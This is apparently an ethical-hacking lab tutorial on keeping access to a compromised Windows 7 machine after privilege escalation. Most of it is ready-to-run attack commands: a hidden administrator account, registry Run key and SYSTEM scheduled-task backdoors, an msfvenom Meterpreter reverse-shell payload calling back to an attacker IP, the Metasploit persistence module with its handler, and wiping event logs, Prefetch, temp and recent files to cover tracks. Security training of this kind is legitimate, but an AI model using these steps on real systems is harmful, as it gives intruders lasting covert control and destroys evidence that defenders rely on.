Maintaining Access in Privilege Escalation

Last Updated : 26 Aug, 2025

Privilege Escalation allows an attacker to gain SYSTEM (Windows) or root (Linux) access. But a one-time shell isn’t enough, if the system reboots, the session drops, or defenders remove you out, you lose control. Maintaining Access ensures persistence so we don’t need to exploit again. Maintaining Access ensures you can:

  • Re-enter the system without repeating exploitation.
  • Stay hidden while persisting in the background.
  • Cover your tracks to avoid detection.

In this lab, we’ll use Metasploit, Meterpreter, and manual techniques to add persistence and cover our tracks.

Learning Outcome

  • Adding users & backdoors for persistence.
  • Using Metasploit persistence module.
  • Proving re-entry after reboot (maintaining access).
  • Covering tracks to remain hidden.

Adding Users for Persistence

Create a hidden admin account to log back in.

net user backdoor Pass@123 /add
net localgroup administrators backdoor /add

You can verify it with:

net user backdoor
add_user_backdoor

Registry Keys for Persistence

This will launch payload automatically on startup

  • To make a registry key that will automatically run backdoor.exe on startup enter this in the shell:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v updater /t REG_SZ /d "C:\backdoor.exe"

After reboot, backdoor.exe will auto-run

Persistence using msfvenom

  • First make the payload in Kali using :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 -f exe > backdoor.exe
add_registry_backdoor
  • Upload this file using meterpreter (don't forget to create the session when exiting using ctrl+Z):
upload backdoor.exe C:\\backdoor.exe
  • make a scheduled task on windows shell
schtasks /create /tn "Updater" /tr "C:\backdoor.exe" /sc onlogon /ru SYSTEM
add_schtasks_backdoor

Reverse Shell Persistence using Metasploit

This will help you create a reverse shell session every time the computer gets rebooted. In the meterpreter use this module:

use exploit/windows/local/persistence
set SESSION 1
set LHOST 192.168.56.102
set LPORT 4444
set STARTUP SYSTEM
set PAYLOAD windows/meterpreter/reverse_tcp
exploit                              # Before exploiting start the listener on another terminal
persistence_backdoor
  • Set up a handler on another kali terminal
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 4444
run
  • Reboot windows 7
  • After reboot, the victim should automatically reconnect to your handler, giving you a new Meterpreter session.
persistence_exploit_listener

Covering Tracks

Once persistence is achieved, the attacker’s next step is to hide their presence. Covering tracks is crucial because defenders often investigate event logs, user history, and suspicious files to detect compromise

  • Clear Event Logs: Attackers often remove these to prevent defenders from tracing activities.
wevtutil cl Security
wevtutil cl Application
wevtutil cl System
  • Or from Meterpreter clear the environment
clearev     # This clears all event logs directly from a Meterpreter session.
  • Clear user history: Windows stores cached and recently executed files which can reveal attacker activity.
del C:\Windows\Prefetch\*.*                   # Delete Prefetch Files
Clearing_tracks

Other useful deletions

del %temp%\*.* /s /q      :: Clear temporary files  
del C:\Users\<User>\Recent\*.* /q  :: Clear recently opened files
Comment
Article Tags:
Ethical Hacking
Cyber Security

Explore